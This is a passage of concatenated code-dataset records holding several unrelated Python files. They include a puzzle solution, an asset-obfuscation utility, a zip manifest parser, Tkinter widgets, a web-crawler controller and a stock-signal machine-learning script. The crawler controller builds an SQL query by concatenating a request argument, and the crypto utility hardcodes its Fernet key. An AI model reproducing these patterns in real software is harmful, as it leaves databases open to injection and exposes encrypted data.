'\\n')\n i+=1\ng.write(buf)\n\n\n\n\n ","sub_path":"taxiweather3.py","file_name":"taxiweather3.py","file_ext":"py","file_size_in_byte":3832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"349257789","text":"from math import factorial\ndef solution(n, k):\n answer = []\n a = [ i for i in range(1,n+1)]\n \n while n != 0:\n \n f = factorial(n)\n v = f // n\n s = a.pop(((k-1) // v))\n \n answer.append( s )\n n = n - 1\n k = k % v\n\n return answer\n\n\nprint(solution(3,5))","sub_path":"Programmers/Programmers_코딩테스트 연습_연습문제_줄 서는 방법.py","file_name":"Programmers_코딩테스트 연습_연습문제_줄 서는 방법.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"237747345","text":"import linecache\nfrom cryptography.fernet import Fernet\n\n\ndef encode_img(file):\n with open(file + \".png\", \"rb\") as f:\n img = f.read()[4:]\n\n with open(file + \".wfi\", \"wb\") as code:\n code.write(b\"\\x89WFI\" + img)\n\n\ndef decode_img(file):\n with open(file + \".wfi\", \"rb\") as code:\n img = code.read()[4:]\n\n with open(file + \".png\", \"wb\") as f:\n f.write(b'\\x89PNG' + img)\n\n return file + \".png\"\n\n\ndef encode_music(file):\n with open(file + \".mp3\", \"rb\") as f:\n music = f.read()[3:]\n\n with open(file + \".wfm\", \"wb\") as code:\n code.write(b\"\\x89WFM\" + music)\n\n\ndef decode_music(file):\n with open(file + \".wfm\", \"rb\") as code:\n music = code.read()[4:]\n\n with open(file + \".mp3\", \"wb\") as f:\n f.write(b'ID3' + music)\n\n return file + \".mp3\"\n\n\n# key = b'PZmLBwWOdMfupJIGWQEGjsxZJ5iQ9NqTbtJOlYrO9SU=' #Fernet.generate_key()\n# print(key)\n#\n# cipher = Fernet(key)\n# text = 'define kirill = Character(\"Кирилл\", color=\"#c8ffc8\")'.encode('utf-8')\n# encrypted = cipher.encrypt(text)\n# print(encrypted)\n#\n# decript = cipher.decrypt(encrypted)\n# print(decript)\n# print(decript.decode('utf-8'))\n\nkey = b'PZmLBwWOdMfupJIGWQEGjsxZJ5iQ9NqTbtJOlYrO9SU='\n\n\ndef encode_script(file):\n cipher = Fernet(key)\n with open(file + \".wfpy\") as f:\n lines = sum(1 for line in f) + 1\n\n with open(file + \".wfs\", \"wb\") as f:\n for l in range(1, lines):\n string = linecache.getline(file + \".wfpy\", l)[:-1]\n string = string.encode('utf-8')\n string = cipher.encrypt(string)\n f.write(string + b\"\\n\")\n\n\ndef decode_script(file, i):\n cipher = Fernet(key)\n with open(file + \".wfs\") as f:\n lines = sum(1 for line in f) + 1\n\n if i < 1 or i > lines:\n raise Exception('Out of file. 
File has ' + str(lines) + \" lines but you tried to read line \" + str(i))\n\n    string = linecache.getline(file + \".wfs\", i)[:-1].encode()\n    string = cipher.decrypt(string)\n    string = string.decode('utf-8')\n    return string","sub_path":"utils/crypto.py","file_name":"crypto.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"652997760","text":"\nimport string\nimport csv\nfrom StringIO import StringIO\n\nfrom interface.objects import AttachmentType\nfrom pyon.public import IonObject, RT\nfrom ion.util.zip import zip_of_b64\nfrom ooi.logging import log\n\nQA_DOCS_MANIFEST_FILE = \"MANIFEST.csv\"\n\nclass QADocParser(object):\n\n    def __init__(self):\n        self.csv_reader = None\n        self.qa_zip_obj = None\n\n    def prepare(self, qa_documents_zip_b64):\n        self.csv_reader = None\n        self.qa_zip_obj = None\n\n        qa_zip_obj, b64err = zip_of_b64(qa_documents_zip_b64, \"qa_documents\")\n\n        if None is qa_zip_obj:\n            return False, (\"Base64 error: %s\" % b64err)\n\n        #parse the manifest file\n        if not QA_DOCS_MANIFEST_FILE in qa_zip_obj.namelist():\n            return False, (\"provided qa_documents zipfile lacks manifest CSV file called %s\" %\n                           QA_DOCS_MANIFEST_FILE)\n\n        log.debug(\"extracting manifest csv file\")\n        csv_contents = qa_zip_obj.read(QA_DOCS_MANIFEST_FILE)\n\n        log.debug(\"parsing manifest csv file\")\n        try:\n            dialect = csv.Sniffer().sniff(csv_contents)\n        except csv.Error:\n            dialect = csv.excel\n        except Exception as e:\n            return False, (\"%s - %s\" % (str(type(e)), str(e.args)))\n        csv_reader = csv.DictReader(StringIO(csv_contents), dialect=dialect)\n\n        #validate fields in manifest file\n        log.debug(\"validating manifest csv file\")\n        for f in [\"filename\", \"name\", \"description\", \"content_type\", \"keywords\"]:\n            if not f in csv_reader.fieldnames:\n                return False, (\"Manifest file %s missing required field %s\" %\n                               (QA_DOCS_MANIFEST_FILE, f))\n\n        self.csv_reader = csv_reader\n        self.qa_zip_obj = qa_zip_obj\n\n        return True, \"\"\n\n\n    def convert_to_attachments(self):\n\n        assert(self.csv_reader is not None)\n        assert(self.qa_zip_obj is not None)\n\n        #create attachment resources for each document in the zip\n        log.debug(\"creating attachment objects\")\n        attachments = []\n        for row in self.csv_reader:\n            att_name = row[\"filename\"]\n            att_desc = row[\"description\"]\n            att_content_type = row[\"content_type\"]\n            att_keywords = string.split(row[\"keywords\"], \",\")\n\n            if not att_name in self.qa_zip_obj.namelist():\n                return None, (\"Manifest refers to a file called '%s' which is not in the zip\" % att_name)\n\n            attachments.append(IonObject(RT.Attachment,\n                                         name=att_name,\n                                         description=att_desc,\n                                         content=self.qa_zip_obj.read(att_name),\n                                         content_type=att_content_type,\n                                         keywords=att_keywords,\n                                         attachment_type=AttachmentType.BLOB))\n\n        log.debug(\"Sanity checking manifest vs zip file\")\n        if len(self.qa_zip_obj.namelist()) - 1 > len(attachments):\n            log.warn(\"There were %d files in the zip but only %d in the manifest\",\n                     len(self.qa_zip_obj.namelist()) - 1,\n                     len(attachments))\n\n        return attachments, \"\"\n","sub_path":"ion/util/qa_doc_parser.py","file_name":"qa_doc_parser.py","file_ext":"py","file_size_in_byte":3275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"423604786","text":"# Creating a Pseudocode Widget using the singleton pattern\n# Shows the lines of a pseudocode file, one label per line; the current line can be highlighted\n\n# How to use:\n# use import pseudocode_widget as pw\n# 
widget = pw.PseudocodeWidget(master)\n# to show a file and highlight line n, use\n# widget.update(\"pseudocode.txt\", n)\n\nimport tkinter as tk\n\n\nclass PseudocodeWidget:\n    class __PseudocodeWidget:\n\n        def __init__(self, master):\n            self.labels = [tk.Label(master=master, bg=\"#2b2b2b\"),\n                           tk.Label(master=master, bg=\"#2b2b2b\"),\n                           tk.Label(master=master, bg=\"#2b2b2b\"),\n                           tk.Label(master=master, bg=\"#2b2b2b\"),\n                           tk.Label(master=master, bg=\"#2b2b2b\"),\n                           tk.Label(master=master, bg=\"#2b2b2b\"),\n                           tk.Label(master=master, bg=\"#2b2b2b\"),\n                           tk.Label(master=master, bg=\"#2b2b2b\"),\n                           tk.Label(master=master, bg=\"#2b2b2b\"),\n                           tk.Label(master=master, bg=\"#2b2b2b\"),\n                           tk.Label(master=master, bg=\"#2b2b2b\"),\n                           tk.Label(master=master, bg=\"#2b2b2b\")]\n\n            self.pseudocode_list = []\n\n    __instance = None\n\n    def __init__(self, master):\n        if not PseudocodeWidget.__instance:  # There is no instance\n            PseudocodeWidget.__instance = PseudocodeWidget.__PseudocodeWidget(master)\n\n    def get_instance(self):\n        return self.__instance\n\n    def restore_default(self):\n        # restore default values for all labels\n        for entry in self.__instance.labels:\n            entry.config(text=\"\", bg=\"#2b2b2b\")\n\n    # returns the label element at the given index\n    def get_label(self, position):\n        return self.get_instance().labels[position]\n\n    # returns a list with all labels\n    def get_all_labels(self):\n        all_label = []\n        for element in self.get_instance().labels:\n            all_label.append(element)\n        return all_label\n\n    def update(self, filename, line):\n        self.open_text_file(filename)\n        self.set_color(\"palegreen\", line)\n\n\n    def pack_labels(self):\n        for element in self.get_instance().labels:\n            element.pack(side=\"top\", fill=\"both\")\n\n    def set_color(self, color, index):\n        self.get_label(index)[\"bg\"] = color\n        self.get_label(index)[\"fg\"] = \"black\"\n\n    # open the file which contains the pseudocode\n    def open_text_file(self, string):\n        self.restore_default()\n        file = open(string, mode=\"r\")\n        position = 0\n        for line in file:\n            PseudocodeWidget.__instance.labels[position].config(text=line, bg=\"#2b2b2b\", fg=\"#a9b7c6\", anchor=\"nw\",\n                                                                font=\"helvetica, 14\", height=1)\n            position += 1\n\n","sub_path":"pseudocode_widget.py","file_name":"pseudocode_widget.py","file_ext":"py","file_size_in_byte":2891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"250064025","text":"\r\n#import os, sys, platform\r\nimport copy\r\nfrom core import dbop, files, argv, urlpy\r\nfrom flask import g\r\nfrom libs import cjnews, cjtool\r\n\r\n# method format: {xxx}Act\r\n# xxx priority order: mkvs.key > mkvs._type > '_def'\r\n\r\n# the class name main is fixed\r\nclass main:\r\n\r\n    # `__init__` uses the common format\r\n    def __init__(self, app):\r\n        self.app = app\r\n        self.data = {}\r\n        self.cfgs = argv.init('1')\r\n        self.db = dbop.dbm(self.cfgs['cdb'])\r\n        self.cj = cjnews.main()\r\n\r\n    # rule search\r\n    def indexAct(self):\r\n        #url = 'http://txjia.com/'\r\n        #a = urlpy.svurl(url, 'debug')\r\n        parts = {}\r\n        parts['city'] = argv.get('city')\r\n        parts['name'] = argv.get('name')\r\n        parts['rid'] = argv.get('rid')\r\n        rules = self.cj.getRules(parts, 'dict', 1)\r\n        data = {'rules':rules, 'city':parts['city'], 'name':parts['name'], 'rid':parts['rid']}\r\n        return data\r\n\r\n    # crawl link list - test\r\n    def linksAct(self):\r\n        rule = self.getRule()\r\n        if not rule:\r\n            return {'links':{}, 'rule':{}}\r\n        links = self.cj.getUList(rule)\r\n        data = {'links':links, 'rule':rule}\r\n        return data\r\n\r\n    # crawl detail page - test\r\n    def detailAct(self):\r\n        rule = 
self.getRule()\r\n        if not rule:\r\n            return {'detail':{}, 'rule':{}}\r\n        url = argv.get('url')\r\n        title = argv.get('title')\r\n        detail = self.cj.getDetail(rule, url)\r\n        rowb = {'title':title,'url':url}\r\n        skips = cjtool.skips(rule, rowb, detail);\r\n        data = {'detail':detail, 'skips':skips, 'rule':rule, 'rowb':rowb}\r\n        return data\r\n\r\n    def getRule(self):\r\n        rid = argv.get('rule')\r\n        sql = \"SELECT * FROM {crawl_rule} WHERE id=\"+rid\r\n        return self.db.get(sql,(),1)\r\n\r\n'''\r\n\r\n    data['d'] = {}\r\n    #data['d'] = {'tpname':'json'} # specify the template\r\n    #data['d'] = {'tpname':'xml'} # specify the template\r\n    #data['d'] = {'tpname':'dir', 'message':'/blog/'} # dir\r\n    #data['d'] = {'code':500, 'message':'500 Message'} # dir\r\n\r\n    # default handler for non-`detail` methods\r\n    def _defAct(self):\r\n        #d = {'tpname':'home/info'} # specify the template\r\n        #d = {'code':404} # show an error page\r\n        d = {}\r\n        data = {'_defAct_msg':'from _defAct', 'd':d}\r\n        return data \r\n'''\r\n","sub_path":"app/ctrls/root_npaCtrl.py","file_name":"root_npaCtrl.py","file_ext":"py","file_size_in_byte":2302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"262190445","text":"from Tkinter import *\nfrom train import *\nfrom platform import *\nfrom outerline import *\nfrom db import *\nfrom usercontrol import *\nimport time\n\npltrains = [] # Trains currently standing at a platform\noutertrains = [] # Trains on the outer lines, not on any platform yet\nwaitingtrains = [] # Trains waiting, not on any platform yet\ntrainl = [] # List of all trains\nplatforml = [] # List of all platforms\nouterl = [] # List of outerlines\nstartstate = False\nfps = 100/6\ncounter = 0 \ntimecnt = ''\n\nclass schtable(Frame):\n    def __init__(self, parent, rows, columns):\n        global trainl, waitingtrains\n        Frame.__init__(self, parent, background=\"black\")\n        self._widgets = []\n        for row in range(rows):\n            current_row = []\n            for column in range(columns):\n                label = Label(self, text=\"\", borderwidth=0, width=10)\n                label.grid(row=row, column=column, sticky=\"nsew\", padx=1, pady=1)\n                current_row.append(label)\n            self._widgets.append(current_row)\n        for column in range(columns):\n            self.grid_columnconfigure(column, weight=1)\n    def set(self, row, column, value):\n        widget = self._widgets[row][column]\n        widget.configure(text=value)\n    \n    def fill(self):\n        r = 1\n        for train in trainl:\n            self.set(r, 0, train.code)\n            self.set(r, 1, train.name)\n            self.set(r, 2, train.arrival)\n            self.set(r, 3, train.departure)\n            self.set(r, 4, train.platform)\n            r+=1\n\n    def update(self):\n        i = 0\n        while i < len(trainl):\n            # refresh the platform column as trains arrive and depart\n            self.set(i + 1, 4, trainl[i].platform)\n            i += 1\n\ndef schedule():\n    # lay out the schedule table in the GUI\n    data()\n\ndef nextslot(hour, mint):\n    # round a time string up to the next announcement slot\n    if int(mint)>=55:\n        hour = str((int(hour)+1)%24)\n        mint=str((int(mint)+5)%60)\n    else:\n        if int(mint)>=45:\n            hour = str((int(hour)+1)%24)\n            mint=str((int(mint)+15)%60)\n    if len(hour)<2:\n        hour = '0'+hour\n    if len(mint)<2:\n        mint = '0'+mint\n    return hour+':'+mint\n\n\ndef simulate():\n    global startstate\n    data()\n    for t in pltrains[:]: # iterate over a copy, the list is modified in the loop\n        if timecnt>=t.departure:\n            t.vel = 2\n            t.platform = 0\n            t.status = \"departed\"\n            del pltrains[pltrains.index(t)]\n            # remove this train from schedule table\n\n    for t in outertrains[:]: # iterate over a copy, the list is modified in the loop\n        flag = 0\n        for p in platforml:\n            if not p.occupied and p.status:\n                flag = 1\n                outer = t.outerline\n                t.vel = 2\n                t.platform = p.platformNo\n                t.status = \"arrived\"\n                p.occupied = True\n                p.train = t\n                del outertrains[outertrains.index(t)]\n                pltrains.append(t)\n                for ol in outerl:\n                    if ol.train==t:\n                        ol.train = None\n                        ol.occupied = False\n                        break\n                break\n        if flag==0:\n            break\n\n    for t in waitingtrains[:]: # iterate over a copy, the list is modified in the loop\n        flag = 0\n        for p in platforml:\n            if not p.occupied and p.status:\n                flag = 1\n                t.vel = 2\n                t.platform = p.platformNo\n                
t.status = \"arrived\"\n p.occupied = True\n p.train = t\n del waitingtrains[waitingtrains.index(t)]\n pltrains.append(t)\n for ol in outerl:\n if ol.train==t:\n ol.train = None\n ol.occupied = False\n break\n break\n if flag==0:\n break\n\n for t in trainl:\n if(t.x<400):\n t.update(app.w)\n for o in outerl:\n o.update(app.w)\n\n if startstate:\n master.after(10, simulate)\n\ndef counter_label(label):\n def count():\n global counter, startstate, timecnt\n counter += 1\n timecnt = time.strftime(\"%H:%M\", time.gmtime(counter))\n label.config(text=\"Timer: \"+time.strftime(\"%H:%M\", time.gmtime(counter)))\n if(startstate):\n label.after(fps, count)\n count()\n\ndef data():\n #Label(frame,text=\"Train Code \"+\"Train Name \"+ \"Arrival Time \"+\"Departure Time \"+\"Arrival Platform Number \").grid(row=0,column=1)\n Label(frame).grid(row=0,column=0,padx=100)\n Label(frame,text=\"Train Code\",font = \"Helvetica 14 bold\").grid(row=0,column=4,padx=30)\n Label(frame,text=\"Train Name\",font = \"Helvetica 14 bold\").grid(row=0,column=8,padx=30)\n Label(frame,text=\"Arrival Time\",font = \"Helvetica 14 bold\").grid(row=0,column=12,padx=30)\n Label(frame,text=\"Departure Time\",font = \"Helvetica 14 bold\").grid(row=0,column=16,padx=30)\n Label(frame,text=\"Platform Number\",font = \"Helvetica 14 bold\").grid(row=0,column=20,padx=30)\n i = 0\n for trains in trainl:\n Label(frame,text=trains.code,font = \"Helvetica 10\").grid(row=i+1,column=4)\n Label(frame,text=trains.name,font = \"Helvetica 10\").grid(row=i+1,column=8)\n Label(frame,text=trains.arrival,font = \"Helvetica 10\").grid(row=i+1,column=12)\n Label(frame,text=trains.departure,font = \"Helvetica 10\").grid(row=i+1,column=16)\n Label(frame,text=trains.platform,font = \"Helvetica 10\").grid(row=i+1,column=20)\n i = i+1\n\ndef myfunction(event):\n canvas.configure(scrollregion=canvas.bbox(\"all\"),width=master.winfo_screenwidth()-100,height=200)\n\nmaster = Tk()\n\nposx = 0\nposy = 0\nscreenWidth = master.winfo_screenwidth()\nscreenHeight = master.winfo_screenheight()\nmaster.wm_geometry(\"%dx%d+%d+%d\" % (screenWidth, screenHeight, posx, posy))\n\nLabel(master, text=\"Welcome To NDLS Railway Station\",fg = \"black\",font = \"Helvetica 18 bold\").pack()\ntimer = Label(master, fg=\"black\", font = \"Helvetica 18 bold\")\ntimer.pack()\napp = App(master)\n\n# All things realted to train time table\nmyframe=Frame(master,relief=GROOVE,width=50,height=100,bd=1)\nmyframe.place(x=10,y=master.winfo_screenheight()-230)\n\ncanvas=Canvas(myframe)\nframe=Frame(canvas)\nmyscrollbar=Scrollbar(myframe,orient=\"vertical\",command=canvas.yview)\ncanvas.configure(yscrollcommand=myscrollbar.set)\n\nmyscrollbar.pack(side=\"right\",fill=\"y\")\ncanvas.pack(side=\"left\")\ncanvas.create_window((0,0),window=frame,anchor='nw')\nframe.bind(\"\",myfunction)\ndata()\n# things related to train timetable over\n\nschedule()\nmaster.mainloop()","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":10321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"268344450","text":"import pandas as pd\nimport numpy as np\nimport talib as ta\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom datetime import datetime\n\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import classification_report\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.preprocessing import StandardScaler\n\nimport 
os\nfrom Alpha_vantage_pricing import get_daily\nfrom Alpha_vantage_pricing import get_intraday\n\npd.set_option('display.max_rows', 500)\npd.set_option('display.max_columns', 500)\npd.set_option('display.width', 500)\n\ntickers = ['AAPL', 'UAA', 'EA', 'AMD', 'BLK', 'BA', 'CBRE', 'KO', 'GE', 'ECL', 'GS', 'KR', 'MRK']\nfor tick in tickers:\n df = pd.DataFrame(get_daily(tick,'full'))\n df.index = pd.to_datetime(df.timestamp)\n df = df.drop('timestamp', axis =1)\n df = df[::-1]\n\n df['sma_5']= pd.Series(df['close']).rolling(5).mean()\n df['sma_10']= pd.Series(df['close']).rolling(10).mean()\n df['sma_20']= pd.Series(df['close']).rolling(20).mean()\n df['MOM_5'] = ta.MOM(df.close.values, timeperiod=5)\n df['MOM_10'] = ta.MOM(df.close.values, timeperiod=10)\n df['EMA5'] = ta.EMA(df.close.values, timeperiod=5)\n df['EMA10'] = ta.EMA(df.close.values, timeperiod=10)\n df['EMA20'] = ta.EMA(df.close.values, timeperiod=20)\n df['EMA60'] = ta.EMA(df.close.values, timeperiod=60)\n #start adding indicators\n df['ROC'] = ta.ROC(df['close'].values, timeperiod=10)\n df['ROCP'] = ta.ROCP(df['close'].values, timeperiod=10)\n\n df['macd1'], df['macdSignal1'], df['macdHist1'] = ta.MACD(df['close'].values, fastperiod=12, slowperiod=26, signalperiod=9)\n df['SAR']= ta.SAR((df['high'].values), (df['low'].values), acceleration = 0.02, maximum = 0.2)\n df['slowk'], df['slowd'] = ta.STOCH((df['high'].values), (df['low'].values), (df['close'].values)\n ,fastk_period=5, slowk_period=3, slowk_matype=0, slowd_period=3, slowd_matype=0)\n df['fastk'], df['fastd'] = ta.STOCHF((df['high'].values), (df['low'].values), (df['close'].values)\n , fastk_period=5, fastd_period=3, fastd_matype=0)\n df['RSI'] = ta.RSI(df.close.values, timeperiod=14)\n df['Williams'] = ta.WILLR(df.high.values, df.low.values, df.close.values, timeperiod=14)\n df['MFI'] = ta.MFI(df.high.values, df.low.values, df.close.values, df.volume.values.astype(float), timeperiod=12)\n df['NAT'] = ta.NATR(df.high.values, df.low.values, df.close.values, timeperiod=12)\n df['TRIX'] = ta.TRIX(df.close.values, timeperiod=30)\n df['PLUS_DI'] = ta.PLUS_DI(df.high.values, df.low.values, df.close.values, timeperiod=12)\n df['MINUS_DI'] = ta.MINUS_DI(df.high.values, df.low.values, df.close.values, timeperiod=12)\n df['BOP'] = ta.BOP(df.open.values, df.high.values, df.low.values, df.close.values)\n df['ADX'] = ta.ADX(df.high.values, df.low.values, df.close.values, timeperiod=12)\n df['TRANGE']= ta.TRANGE(df.high.values, df.low.values, df.close.values)\n df['OBV'] = ta.OBV(df.close.values, df.volume.values.astype(float))\n df['ADOSC'] = ta.ADOSC(df.high.values, df.low.values, df.close.values, df.volume.values.astype(float), fastperiod=3, slowperiod=10)\n df['CRTDR'] = (df.close.values - df.low.values) / (df.high.values - df.low.values)\n df['ATR'] = ta.ATR(df.high.values, df.low.values, df.close.values, timeperiod=12)\n\n #look at returns compared to x days back (pos shift to go back x days)\n df['1day_returns'] = np.log(df.close/df.close.shift(1))\n df['5day_returns'] = np.log(df.close/df.close.shift(5))\n df['10day_returns'] = np.log(df.close/df.close.shift(10))\n df['20day_returns'] = np.log(df.close/df.close.shift(20))\n df['60day_returns'] = np.log(df.close/df.close.shift(60))\n\n #Signals if price goes up or down in future (negative shift to go to future)\n df['1day_Signal'] = 0\n df['5day_Signal'] = 0\n df['10day_Signal'] = 0\n df['20day_Signal'] = 0\n df['60day_Signal'] = 0\n\n df['1day_Signal'][df['1day_returns'].shift(-1) > 0] = 1\n 
df['1day_Signal'][df['1day_returns'].shift(-1) < 0] = -1\n df['5day_Signal'][df['5day_returns'].shift(-5) > 0] = 1\n df['5day_Signal'][df['5day_returns'].shift(-5) < 0] = -1\n df['10day_Signal'][df['10day_returns'].shift(-10) > 0] = 1\n df['10day_Signal'][df['10day_returns'].shift(-10) < 0] = -1\n df['20day_Signal'][df['20day_returns'].shift(-20) > 0] = 1\n df['20day_Signal'][df['20day_returns'].shift(-20) < 0] = -1\n df['60day_Signal'][df['60day_returns'].shift(-60) > 0] = 1\n df['60day_Signal'][df['60day_returns'].shift(-60) < 0] = -1\n\n\n #plot market returns - only for the plot not\n df['mkt_returns1'] = df['1day_returns'] #.expanding().sum()\n df['mkt_returns5'] = df['5day_returns'] #.expanding().sum()\n df['mkt_returns10'] = df['10day_returns'] #.expanding().sum()\n df['mkt_returns20'] = df['20day_returns'] #.expanding().sum()\n df['mkt_returns60'] = df['60day_returns'] #.expanding().sum()\n\n #Confirm by looking at \" perfect strategy returns\" i.e. buy if price will go up in future\n #for today, get signal from 60 days ago and mult by todays 60 day ret\n df['str_returns1'] = df['1day_Signal'].shift(1)* df['1day_returns']\n df['str_returns5'] = df['5day_Signal'].shift(5)* df['5day_returns']\n df['str_returns10'] = df['10day_Signal'].shift(10)* df['10day_returns']\n df['str_returns20'] = df['20day_Signal'].shift(20)* df['20day_returns']\n df['str_returns60'] = df['60day_Signal'].shift(60)* df['60day_returns']\n Periods = ['1','5','10','20','60']\n for PER in Periods:\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.plot(df['str_returns'+str(PER)].iloc[::int(PER)].expanding().sum(), color='r', label=str(PER)+\" day Perfect Strategy Returns\")\n ax.plot(df['mkt_returns'+str(PER)].iloc[::int(PER)].expanding().sum(), color='b', label=str(PER)+\" day Market Returns\")\n plt.legend(loc='best')\n plt.title(\"Returns for Perfect Trading at the Close\")\n plt.show()\n df.replace(-0,0)\n data = df.astype(float)\n\n####NEED TO CONTINUE TO SPLIT OUT DATA INTO DIFF TIME PERIODS _ PREV WAS PREDICTING 60 day return one day out i.e today day 59 and predict day 60 returns\n SIGNAL = ['60', '20', '10', '5', '1']\n for Sig in SIGNAL:\n data = df.astype(float) #these vars are good bc we based the signal decision on the next day returns i.e. 
shift forward is implemented\n data = data[[str(Sig)+'day_Signal','open', 'high', 'low', 'close', 'volume', 'sma_5', 'sma_10', 'sma_20', 'MOM_5', 'MOM_10', 'EMA5', 'EMA10', 'EMA20', 'EMA60', 'macd1', 'macdSignal1', 'macdHist1', 'SAR', 'slowk', 'slowd', 'fastk', 'fastd', 'RSI', 'Williams', 'MFI', 'NAT', 'TRIX', 'PLUS_DI', 'MINUS_DI', 'BOP', 'ADX', 'TRANGE', 'OBV', 'ADOSC', 'CRTDR', 'ATR', '1day_returns', '5day_returns', '10day_returns', '20day_returns', '60day_returns']]\n data[str(Sig)+'day_Signal'][data[str(Sig)+'day_Signal'] == 1] = 'BUY'\n data[str(Sig)+'day_Signal'][data[str(Sig)+'day_Signal'] == -1] = 'SELL'\n data[str(Sig)+'day_Signal'][data[str(Sig)+'day_Signal'] == 0] = 'NA'\n data = data.dropna()\n X, y = data.iloc[:, 1:], data[str(Sig)+'day_Signal']\n X_train, X_test = X[X.index < '2017-01-01'], X[X.index >= '2017-01-01']\n y_train, y_test = y[y.index < '2017-01-01'], y[y.index >= '2017-01-01']\n scaler = StandardScaler().fit(X_train)\n X_train = scaler.transform(X_train)\n X_test = scaler.transform(X_test)\n #y_test = np.log(y_test) gives shitty results\n #y_train = np.log(y_train)\n '''scalery = StandardScaler().fit(np.array(y_train).reshape(-1, 1))\n y_test = scalery.transform(np.array(y_test).reshape(-1, 1))\n y_train = scalery.transform(np.array(y_train).reshape(-1, 1))'''\n print(str(Sig)+'Signal')\n print(tick)\n model = RandomForestClassifier(n_estimators=1000, max_depth=5, max_features='sqrt', random_state=42)\n print(model)\n model.fit(X_train, y_train)\n model.score(X_test, y_test)\n y_pred = model.predict(X_test)\n print(classification_report(y_test, y_pred))\n print(confusion_matrix(y_test,y_pred))\n #get the returns of the model\n y_pred[y_pred == 'BUY'] = 1\n y_pred[y_pred == 'SELL'] = -1\n y_pred[y_pred == 'NA'] = 0\n strat_returns = pd.Series(y_pred).shift(int(Sig))* X[str(Sig)+'day_returns'][X.index >= '2017-01-01'].values\n #get the returns of the perfect strategy\n y_test[y_test == 'BUY'] = 1\n y_test[y_test == 'SELL'] = -1\n y_test[y_test == 'NA'] = 0\n perf_returns = pd.Series(pd.Series(y_test).shift(int(Sig))* X[str(Sig)+'day_returns'][X.index >= '2017-01-01'].values).reset_index(drop=True)\n #returns of the market\n mkt_returns = pd.Series(X[str(Sig)+'day_returns'][X.index >= '2017-01-01'].values).reset_index(drop=True)\n #plot the result\n fig = plt.figure()\n ax = fig.add_subplot(111) #grabbing every nth row of returns to get the cum sum is what allows us mutiply to get 5 day returns every day\n ax.plot(perf_returns.iloc[::int(Sig)].expanding().sum(), color='b', label='Test '+str(Sig)+'day_Signal Perfect Strategy Returns') #need to only sum every 5th term..\n ax.plot(mkt_returns.iloc[::int(Sig)].expanding().sum(), color='r', label='Test'+str(Sig)+'day_Signal Market Returns')\n ax.plot(strat_returns.iloc[::int(Sig)].expanding().sum(), color='g', label='Test '+str(Sig)+'day_Signal Strategy Returns')\n plt.legend(loc='best')\n plt.title(\"Algo Test Returns\")\n plt.show()\n#save plots to compare - market return levels should be same but smoothed - ie. 
same max; strat and perf should ideally increase bc more trades to take advantage of more gains\n#if doing application - can only make decision to buy/sell every 5 days.\n#maybe pull in minute data in addition to daily ---> or what is better might be to take into account cost and model with hold, strong/weak/buy/sell\n\n'''\nprint(\"Gbooster:\") #..36; cv gives 56 #terrible when scaled\nfrom sklearn.ensemble import GradientBoostingClassifier\nmodel= GradientBoostingClassifier()\nmodel.fit(X_train, y_train)\nmodel.score(X_test,y_test)\ny_pred = model.predict(X_test)\nprint('MSE')\nprint(mean_squared_error(y_test, y_pred))\nprint(\"MAE\")\nprint(mean_absolute_error(y_test, y_pred))\nprint(\"R^2\")\nprint(r2_score(y_test, y_pred))\n\nfrom sklearn.ensemble import RandomForestClassifier #good when all vars are scaled\nmodel = RandomForestClassifier(n_estimators=100, random_state=42)\nmodel.fit(X_train, y_train)\nmodel.score(X_test,y_test)\ny_pred = model.predict(X_test)\nprint(classification_report(y_test, y_pred))\n\nprint('MSE')\nprint(mean_squared_error(y_test, y_pred))\nprint(\"MAE\")\nprint(mean_absolute_error(y_test, y_pred))\nprint(\"R^2\")\nprint(r2_score(y_test, y_pred))\n\nprint(\"ExtraTrees:\") #25\nfrom sklearn.ensemble import ExtraTreesClassifier\nmodel = ExtraTreesClassifier(random_state=42)\nmodel.fit(X_train, y_train)\ny_pred = model.predict(X_test)\nprint('MSE')\nprint(mean_squared_error(y_test, y_pred))\nprint(\"MAE\")\nprint(mean_absolute_error(y_test, y_pred))\nprint(\"R^2\")\nprint(r2_score(y_test, y_pred))\n\n\nmodel = Sequential()\nmodel.add(Dense(128, input_dim=X_test.shape[1] ,init='uniform'))\nmodel.add(Dense(64, init='uniform',activation='relu'))\nmodel.add(Dense(8, init='uniform',activation='relu'))\nmodel.add(Dense(1, init='uniform',activation='sigmoid'))\nprint(model.summary())\n\nmodel.compile(loss='mean_squared_error',optimizer='adam',metrics=['mae','mse','mape'])\nnnet = model.fit(X_train,y_train, epochs = 100, batch_size=10)\nscores = model.evaluate(X_test, y_test)\nprint(\"\\n%s: %.2f\" % (model.metrics_names[1],scores[1]))\nprint(\"\\n%s: %.2f\" % (model.metrics_names[2],scores[2]))\nprint(\"\\n%s: %.2f%%\" % (model.metrics_names[3],scores[3]*100))\n\nfrom sklearn.neural_network import MLPClassifier\nprint(\"NNET:\")\nmodel = MLPClassifier(alpha=.00001,max_iter=5000) #57; cv .01\nmodel.fit(X_train, y_train)\ny_pred = model.predict(X_test)\nprint('MSE')\nprint(mean_squared_error(y_test, y_pred))\nprint(\"MAE\")\nprint(mean_absolute_error(y_test, y_pred))\nprint(\"R^2\")\nprint(r2_score(y_test, y_pred))\n'''","sub_path":"Blake_Algo.py","file_name":"Blake_Algo.py","file_ext":"py","file_size_in_byte":12255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"408987133","text":"# -*- coding:utf-8 -*-\nimport 